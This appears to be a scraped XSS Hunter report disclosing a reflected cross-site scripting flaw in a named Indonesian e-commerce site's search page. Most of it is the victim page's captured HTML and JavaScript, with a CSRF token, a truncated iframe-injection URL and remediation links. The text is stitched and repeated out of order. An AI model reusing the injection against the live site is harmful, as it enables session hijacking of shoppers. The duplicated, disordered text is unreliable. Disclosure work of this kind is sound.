<div class="text-center text-md-left mt-4">
<h4 class="fs-13 text-uppercase fw-600 border-bottom border-gray-900 pb-2 mb-4">
Kontak
</h4>
<li class="mb-2">
<span class="d-block opacity-30">Alamat:</span>
<span class="d-block opacity-70">Ampera Building, Jl. Ampera Raya No.18.B,
RT.4/RW.4, Cilandak Tim., Kec. Ps. Minggu, Kota Jakarta Selatan, Daerah Khusus Ibukota Jakarta
12560</span>
</li>
<li class="mb-2">
<span class="d-block opacity-30">Telepon:</span>
<span class="d-block opacity-70">(021) 27874784</span>
</li>
<li class="mb-2">
<span class="d-block opacity-30">Email:</span>
<span class="d-block opacity-70">
<a href="mailto:cs@dgpmall.com" class="text-reset">cs@dgpmall.com</a>
</span>
</li>
</ul>
</div>
</div>
</h4>
</ul>
</div>
</div>
<div class="col-md-4 col-lg-2">

Akun Saya
</h4>
<li class="mb-2">
<a class="opacity-50 hov-opacity-100 text-reset"
href="https://dgpmall.com/users/login">
Masuk
</a>
</li>
<li class="mb-2">
href="https://dgpmall.com/purchase_history">
Daftar Pembelian Produk
</a>
</li>
<li class="mb-2">
href="https://dgpmall.com/wishlists">
Wishlist Kamu
</a>
</li>
<li class="mb-2">
<a class="opacity-50 hov-opacity-100 text-reset" href="https://dgpmall.com/track-
your-order">
Lacak Pesanan
</a>
</li>
</ul>
</div>
Daftar Jadi Penjual
</h4>
<a href="https://dgpmall.com/shops/create" class="btn btn-primary btn-sm shadow-
md">
Daftar Sekarang
</a>
</div>
</div>
</div>
</div>
</section>


<footer class="pt-3 pb-7 pb-xl-3 bg-black text-light">
<div class="row align-items-center">
<div class="col-lg-4">
<div class="text-center text-md-left" current-verison="4.8">
© DGP Mall 2021 </div>
</div>
<ul class="list-inline my-3 my-md-0 social colored text-center">
<a href="https://facebook.com/dgpmall" target="_blank" class="facebook"><i class="lab
la-facebook-f"></i></a>
</li>
<a href="#" target="_blank" class="twitter"><i class="lab la-twitter"></i></a>
</li>
<a href="https://instagram.com/dgpmall" target="_blank" class="instagram"><i
class="lab la-instagram"></i></a>
</li>
<a href="https://www.youtube.com/channel/UCoOH9ZktaYI63CRWptM9PfQ/"
target="_blank" class="youtube"><i class="lab la-youtube"></i></a>
</li>
<a href="#" target="_blank" class="linkedin"><i class="lab la-linkedin-in"></i></a>
</li>
</ul>
</div>
<div class="text-center text-md-right">
<ul class="list-inline mb-0">
<img
src="https://dgpmall.com/public/uploads/all/azi5yH02tyREe1gqOWHR1kLJJaKuxseqDEo3150j.png"
height="30" class="mw-100 h-auto" style="max-height: 30px">
</li>
</ul>
</div>
</div>
</div>
</div>
</footer>
<div class="aiz-mobile-bottom-nav d-xl-none fixed-bottom bg-white shadow-lg border-top">

<div class="d-flex justify-content-around align-items-center">
<a href="https://dgpmall.com" class="text-reset flex-grow-1 text-center py-3 border-right ">
<i class="las la-home la-2x"></i>
</a>
<a href="https://dgpmall.com/categories" class="text-reset flex-grow-1 text-center py-3 border-
right ">
<span class="d-inline-block position-relative px-2">
<i class="las la-list-ul la-2x"></i>
</span>
</a>
<a href="https://dgpmall.com/cart" class="text-reset flex-grow-1 text-center py-3 border-right ">
<span class="d-inline-block position-relative px-2">
<i class="las la-shopping-cart la-2x"></i>
<span class="badge badge-circle badge-primary position-absolute absolute-top-
right" id="cart_items_sidenav">0</span>
</span>
</a>
<a href="https://dgpmall.com/users/login" class="text-reset flex-grow-1 text-center py-2">
<span class="avatar avatar-sm d-block mx-auto">
<img src="https://dgpmall.com/public/assets/img/avatar-place.png">
</span>
</a>
</div>
</div>
</div>
<script>
function confirm_modal(delete_url)
{
jQuery('#confirm-delete').modal('show', {backdrop: 'static'});
document.getElementById('delete_link').setAttribute('href' , delete_url);
}
</script>
<div class="modal fade" id="confirm-delete" tabindex="-1" role="dialog" aria-

labelledby="myModalLabel" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h4 class="modal-title" id="myModalLabel">Konfirmasi</h4>

</div>
<div class="modal-body">
<p>Pesan konfirmasi hapus</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal">Batalkan</button>
<a id="delete_link" class="btn btn-danger btn-ok">Hapus</a>
</div>
</div>
</div>
</div>
<div class="modal fade" id="addToCart">

<div class="modal-dialog modal-lg modal-dialog-centered modal-dialog-zoom product-modal"
id="modal-size" role="document">
<div class="modal-content position-relative">
<div class="c-preloader text-center p-3">
<i class="las la-spinner la-spin la-3x"></i>
</div>
<button type="button" class="close absolute-top-right btn-icon close z-1" data-
dismiss="modal" aria-label="Close">
<span aria-hidden="true" class="la-2x">×</span>
</button>
<div id="addToCart-modal-body">
</div>
</div>
</div>
</div>


<script src="https://dgpmall.com/public/assets/js/vendors.js"></script>
<script src="https://dgpmall.com/public/assets/js/aiz-core.js"></script>
<script>
</script>
<script>
$(document).ready(function() {
$('.category-nav-element').each(function(i, el) {
$(el).on('mouseover', function(){
if(!$(el).find('.sub-cat-menu').hasClass('loaded')){
$.post('https://dgpmall.com/category/nav-element-list', {_token: AIZ.data.csrf, id:$
(el).data('id')}, function(data){
$(el).find('.sub-cat-menu').addClass('loaded').html(data);
});
}
});
});
if ($('#lang-change').length > 0) {
$('#lang-change .dropdown-menu a').each(function() {
$(this).on('click', function(e){
e.preventDefault();
var $this = $(this);
var locale = $this.data('flag');
$.post('https://dgpmall.com/language',{_token: AIZ.data.csrf, locale:locale},
function(data){
location.reload();
});
});
});
}
if ($('#currency-change').length > 0) {
$('#currency-change .dropdown-menu a').each(function() {
$(this).on('click', function(e){
e.preventDefault();
var $this = $(this);
var currency_code = $this.data('currency');
$.post('https://dgpmall.com/currency',{_token: AIZ.data.csrf,
currency_code:currency_code}, function(data){
location.reload();
});
});
});
}
});
$('#search').on('keyup', function(){
search();
});
$('#search').on('focus', function(){
search();
});
function search(){
var searchKey = $('#search').val();
if(searchKey.length > 0){
$('body').addClass("typed-search-box-shown");
$('.typed-search-box').removeClass('d-none');
$('.search-preloader').removeClass('d-none');
$.post('https://dgpmall.com/ajax-search', { _token: AIZ.data.csrf, search:searchKey},
function(data){
if(data == '0'){
// $('.typed-search-box').addClass('d-none');
$('#search-content').html(null);
$('.typed-search-box .search-nothing').removeClass('d-none').html('Sorry, nothing found
for <strong>"'+searchKey+'"</strong>');
$('.search-preloader').addClass('d-none');
}
else{
$('.typed-search-box .search-nothing').addClass('d-none').html(null);
$('#search-content').html(data);
$('.search-preloader').addClass('d-none');
}
});
}
else {
$('.typed-search-box').addClass('d-none');
$('body').removeClass("typed-search-box-shown");
}
}
function updateNavCart(){
$.post('https://dgpmall.com/cart/nav-cart-items', {_token: AIZ.data.csrf }, function(data){
$('#cart_items').html(data);
});
}
function removeFromCart(key){
$.post('https://dgpmall.com/cart/removeFromCart', {
_token : AIZ.data.csrf,
id : key
}, function(data){
updateNavCart();
$('#cart-summary').html(data);
AIZ.plugins.notify('success', 'Item has been removed from cart');
$('#cart_items_sidenav').html(parseInt($('#cart_items_sidenav').html())-1);
});
}
function addToCompare(id){
$.post('https://dgpmall.com/compare/addToCompare', {_token: AIZ.data.csrf, id:id},
function(data){
$('#compare').html(data);
AIZ.plugins.notify('success', "Produk udah ditambah ke daftar perbandingan");
$('#compare_items_sidenav').html(parseInt($('#compare_items_sidenav').html())+1);
});
}
function addToWishList(id){
AIZ.plugins.notify('warning', "Masuk Dulu Dong");
}
function showAddToCartModal(id){
if(!$('#modal-size').hasClass('modal-lg')){
$('#modal-size').addClass('modal-lg');
}
$('#addToCart-modal-body').html(null);
$('#addToCart').modal();
$('.c-preloader').show();
$.post('https://dgpmall.com/cart/show-cart-modal', {_token: AIZ.data.csrf, id:id},
function(data){
$('.c-preloader').hide();
$('#addToCart-modal-body').html(data);
AIZ.plugins.slickCarousel();
AIZ.plugins.zoom();
AIZ.extra.plusMinus();
getVariantPrice();
});
}
$('#option-choice-form input').on('change', function(){

getVariantPrice();
});
function getVariantPrice(){
if($('#option-choice-form input[name=quantity]').val() > 0 && checkAddToCartValidity()){
$.ajax({
type:"POST",
url: 'https://dgpmall.com/product/variant_price',
data: $('#option-choice-form').serializeArray(),
success: function(data){
$('.product-gallery-thumb .carousel-box').each(function (i) {

if($(this).data('variation') && data.variation == $(this).data('variation')){
$('.product-gallery-thumb').slick('slickGoTo', i);
}
})
$('#option-choice-form #chosen_price_div').removeClass('d-none');
$('#option-choice-form #chosen_price_div #chosen_price').html(data.price);
$('#available-quantity').html(data.quantity);
$('.input-number').prop('max', data.max_limit);
if(parseInt(data.in_stock) == 0 && data.digital == 0){
$('.buy-now').addClass('d-none');
$('.add-to-cart').addClass('d-none');
$('.out-of-stock').removeClass('d-none');
}
else{
$('.buy-now').removeClass('d-none');
$('.add-to-cart').removeClass('d-none');
$('.out-of-stock').addClass('d-none');
}
}
});
}
}
function checkAddToCartValidity(){
var names = {};
$('#option-choice-form input:radio').each(function() { // find unique names
names[$(this).attr('name')] = true;
});
var count = 0;
$.each(names, function() { // then count them
count++;
});
if($('#option-choice-form input:radio:checked').length == count){

return true;
}
return false;
}
function addToCart(){
if(checkAddToCartValidity()) {
$.ajax({
type:"POST",
url: 'https://dgpmall.com/cart/addtocart',
$('#modal-size').removeClass('modal-lg');
$('#addToCart-modal-body').html(data.view);
updateNavCart();
$('#cart_items_sidenav').html(parseInt($('#cart_items_sidenav').html())+1);
}
});
}
else{
AIZ.plugins.notify('warning', 'Please choose all the options');
}
}
function buyNow(){
if(checkAddToCartValidity()) {
$.ajax({
type:"POST",
url: 'https://dgpmall.com/cart/addtocart',
if(data.status == 1){
updateNavCart();
$('#cart_items_sidenav').html(parseInt($('#cart_items_sidenav').html())+1);
window.location.replace("https://dgpmall.com/cart");
}
else{
$('#modal-size').removeClass('modal-lg');
$('#addToCart-modal-body').html(data.view);
}
}
});
}
else{
AIZ.plugins.notify('warning', 'Please choose all the options');
}
}
function show_purchase_history_details(order_id)
{
$('#order-details-modal-body').html(null);
}
$.post('https://dgpmall.com/purchase_history/details', { _token : AIZ.data.csrf, order_id :

order_id}, function(data){
$('#order-details-modal-body').html(data);
$('#order_details').modal();
});
}
function show_order_details(order_id)
{
$('#order-details-modal-body').html(null);
}
$.post('https://dgpmall.com/orders/details', { _token : AIZ.data.csrf, order_id : order_id},

function(data){
$('#order-details-modal-body').html(data);
$('#order_details').modal();
});
}
function cartQuantityInitialize(){
$('.btn-number').click(function(e) {
e.preventDefault();
fieldName = $(this).attr('data-field');
type = $(this).attr('data-type');
var input = $("input[name='" + fieldName + "']");
var currentVal = parseInt(input.val());
if (!isNaN(currentVal)) {
if (type == 'minus') {
if (currentVal > input.attr('min')) {

input.val(currentVal - 1).change();
}
if (parseInt(input.val()) == input.attr('min')) {
$(this).attr('disabled', true);
}
} else if (type == 'plus') {
if (currentVal < input.attr('max')) {

input.val(currentVal + 1).change();
}
if (parseInt(input.val()) == input.attr('max')) {
$(this).attr('disabled', true);
}
}
} else {
input.val(0);
}
});
$('.input-number').focusin(function() {
$(this).data('oldValue', $(this).val());
});
$('.input-number').change(function() {
minValue = parseInt($(this).attr('min'));
maxValue = parseInt($(this).attr('max'));
valueCurrent = parseInt($(this).val());
name = $(this).attr('name');
if (valueCurrent >= minValue) {
$(".btn-number[data-type='minus'][data-field='" + name + "']").removeAttr('disabled')
} else {
alert('Sorry, the minimum value was reached');
$(this).val($(this).data('oldValue'));
}
if (valueCurrent <= maxValue) {
$(".btn-number[data-type='plus'][data-field='" + name + "']").removeAttr('disabled')
} else {
alert('Sorry, the maximum value was reached');
$(this).val($(this).data('oldValue'));
}
});
$(".input-number").keydown(function(e) {
// Allow: backspace, delete, tab, escape, enter and .
if ($.inArray(e.keyCode, [46, 8, 9, 27, 13, 190]) !== -1 ||
// Allow: Ctrl+A
(e.keyCode == 65 && e.ctrlKey === true) ||
// Allow: home, end, left, right
(e.keyCode >= 35 && e.keyCode <= 39)) {
// let it happen, don't do anything
return;
}
// Ensure that it is a number and stop the keypress
if ((e.shiftKey || (e.keyCode < 48 || e.keyCode > 57)) && (e.keyCode < 96 || e.keyCode >
105)) {
e.preventDefault();
}
});
}
function imageInputInitialize(){
$('.custom-input-file').each(function() {
var $input = $(this),
$label = $input.next('label'),
labelVal = $label.html();
$input.on('change', function(e) {
var fileName = '';
if (this.files && this.files.length > 1)

fileName = (this.getAttribute('data-multiple-caption') || '').replace('{count}',
this.files.length);
else if (e.target.value)
fileName = e.target.value.split('\\').pop();
if (fileName)
$label.find('span').html(fileName);
else
$label.html(labelVal);
});
// Firefox bug fix

$input
.on('focus', function() {
$input.addClass('has-focus');
})
.on('blur', function() {
$input.removeClass('has-focus');
});
});
}
</script>
<script type="text/javascript">
function filter(){
$('#search-form').submit();
}
function rangefilter(arg){
$('input[name=min_price]').val(arg[0]);
$('input[name=max_price]').val(arg[1]);
filter();
}
</script>
<iframe width="1366" height="634" scrolling="no" style="visibility: hidden; position: absolute; top:
-10000px; left: -10000px;"></iframe></body></html>
```
##### Injection Point (Raw HTTP Request)

```http
null
```
##### Origin
`https://dgpmall.com`
##### HTML5 Canvas-Rendered Screenshot

https://api.xsshunter.com/uploads/xsshunter_screenshot_3818f4d9bed5bfbbdefeea7f5f3e715909e8
bf28c282a40b77a2dd1b8332b0b2eb9e8081e8a0249ee5d611f6c0a26750ada489a50bc60a15d1ab95c
db6d139b8e7897cd6aa9ce0dc50883dee51592f957fd7d71b54c2b724941d57c450386bd5e063b151.p
ng
##### Injection Timestamp

`1631328248`
## Remediation
For more information about Cross-site Scripting and remediation of the issue, see the following
resources:
* [Cross-site Scripting (XSS) - OWASP](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))

* [XSS (Cross Site Scripting) Prevention Cheat Sheet - OWASP]
(https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
* [What is Cross-site Scripting and How Can You Fix it?]
(https://www.acunetix.com/websitesecurity/cross-site-scripting/)
* [An Introduction to Content Security Policy - HTML5 Rocks]
(http://www.html5rocks.com/en/tutorials/security/content-security-policy/)
* [Why is the same origin policy so important? - Information Security Stack Exchange]
(https://security.stackexchange.com/questions/8264/why-is-the-same-origin-policy-so-important)
*This report was generated by Dimas Ariadi, HCIA-SEC.

XSS Hunter Report by DimasAriadi

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

XSS Hunter Report by DimasAriadi

Uploaded by

Copyright:

Available Formats

# XSS Hunter Report By DimasAriadi

The page located at `https://dgpmall.com/search?q=%22%3E%3Ciframe+srcdoc%3D

### XSS Payload Fire Details

##### Victim IP Address

##### User Agent

##### Cookies (Non-HTTPOnly)

##### Document Object Model (DOM)

<meta name="csrf-token" content="lmWIYNwh8dCIQvZeujCWJBoT4IpHCcIS6x44DrsW">

Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

Menggunakan teknologi blockchain, yakni DGPayment sebagai dukungan untuk pembayaran

<script type="text/javascript" src="https://js.xendit.co/v1/xendit.min.js"></script>

<li class="list-inline-item dropdown" id="currency-change">

<div class="col-5 text-right d-none d-lg-block">

<div class="col-auto col-xl-3 pl-0 pr-3 d-flex align-items-center">

<div class="d-none d-xl-block align-self-stretch category-menu-icon-box ml-

<div class="flex-grow-1 front-header-search d-flex align-items-center bg-white">

<div class="d-none d-lg-none ml-3 mr-0">

<div class="d-none d-lg-block ml-3 mr-0">

<div class="d-none d-lg-block ml-3 mr-0">

<div class="d-none d-lg-block align-self-stretch ml-3 mr-0" data-hover="dropdown">

<div class="text-center p-3">

<section class="mb-4 pt-3">

<div class="row mt-2">

<ul class="breadcrumb bg-transparent p-0">

<section class="bg-white border-top mt-auto">

<section class="bg-dark py-5 text-light footer-widget">

<div class="col-md-4 col-lg-2">

<div class="aiz-mobile-bottom-nav d-xl-none fixed-bottom bg-white shadow-lg border-top">

<div class="modal fade" id="confirm-delete" tabindex="-1" role="dialog" aria-

<h4 class="modal-title" id="myModalLabel">Konfirmasi</h4>

<div class="modal fade" id="addToCart">

$('#option-choice-form input').on('change', function(){

$('.product-gallery-thumb .carousel-box').each(function (i) {

if($('#option-choice-form input:radio:checked').length == count){

$.post('https://dgpmall.com/purchase_history/details', { _token : AIZ.data.csrf, order_id :

$.post('https://dgpmall.com/orders/details', { _token : AIZ.data.csrf, order_id : order_id},

if (currentVal > input.attr('min')) {

} else if (type == 'plus') {

if (currentVal < input.attr('max')) {

if (this.files && this.files.length > 1)

// Firefox bug fix

##### Injection Point (Raw HTTP Request)

##### HTML5 Canvas-Rendered Screenshot

##### Injection Timestamp

* [Cross-site Scripting (XSS) - OWASP](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))

*This report was generated by Dimas Ariadi, HCIA-SEC.